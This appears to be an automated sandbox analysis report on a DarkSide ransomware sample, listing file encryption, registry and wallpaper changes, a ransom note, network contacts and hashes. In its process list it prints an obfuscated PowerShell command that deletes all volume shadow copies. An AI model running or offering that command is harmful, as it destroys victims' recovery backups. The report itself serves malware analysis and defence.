Analysis Overview
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
Threat Level: Known bad
The file PurchaseOrderPoster.bin was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
UPX packed file
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Control Panel
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-10-01 10:21
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-10-01 10:21
Reported
2021-10-01 10:24
Platform
win10-en-20210920
Max time kernel
149s
Max time network
152s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CompleteConvertFrom.raw => C:\Users\Admin\Pictures\CompleteConvertFrom.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteConvertFrom.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportInstall.tif => C:\Users\Admin\Pictures\ExportInstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportInstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PopFind.raw => C:\Users\Admin\Pictures\PopFind.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PopFind.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResolveUninstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupConvertFrom.tif => C:\Users\Admin\Pictures\BackupConvertFrom.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupConvertFrom.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportHide.raw => C:\Users\Admin\Pictures\ExportHide.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveUninstall.tif => C:\Users\Admin\Pictures\ResolveUninstall.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnpublishRequest.tif => C:\Users\Admin\Pictures\UnpublishRequest.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnpublishRequest.tif.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertInvoke.png => C:\Users\Admin\Pictures\AssertInvoke.png.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AssertInvoke.png.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportHide.raw.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\ae8bdb72.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\ae8bdb72.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ae8bdb72\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\ae8bdb72.ico" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ae8bdb72\ = "ae8bdb72" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ae8bdb72\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ae8bdb72 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2168 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2168 wrote to memory of 3700 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
"C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.ae8bdb72.TXT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| FR | 2.18.105.186:443 | tcp |
Files
memory/3700-115-0x0000000000000000-mapping.dmp
memory/3700-121-0x0000029FCC760000-0x0000029FCC761000-memory.dmp
memory/3700-126-0x0000029FE6BA0000-0x0000029FE6BA1000-memory.dmp
memory/3700-131-0x0000029FCC6F0000-0x0000029FCC6F2000-memory.dmp
memory/3700-133-0x0000029FCC6F6000-0x0000029FCC6F8000-memory.dmp
memory/3700-132-0x0000029FCC6F3000-0x0000029FCC6F5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 618a15a86c763cc6ac1a9efc9332ff6f |
| SHA1 | 574c8c0c8be023f4bf4fba1cc29f4bccc8253cb7 |
| SHA256 | 4591d24d98cf7c51ef6da5330d2f017acfb5aa7d1ec9822231903daed53412dc |
| SHA512 | 42993e4c55e76aa4fef8be22788f8b93b67428e7851136cfdb1db2134358aaeb22e2f3cfb331460aee16e9c119ff0f12b387b603dfbd0d47e736fa741e848646 |
C:\Users\Admin\Desktop\README.ae8bdb72.TXT
| MD5 | f418a249405444da33cc73b402a26306 |
| SHA1 | 1a6c493e74036f93f0dae4b65e6c543c213ce418 |
| SHA256 | b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09 |
| SHA512 | b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf |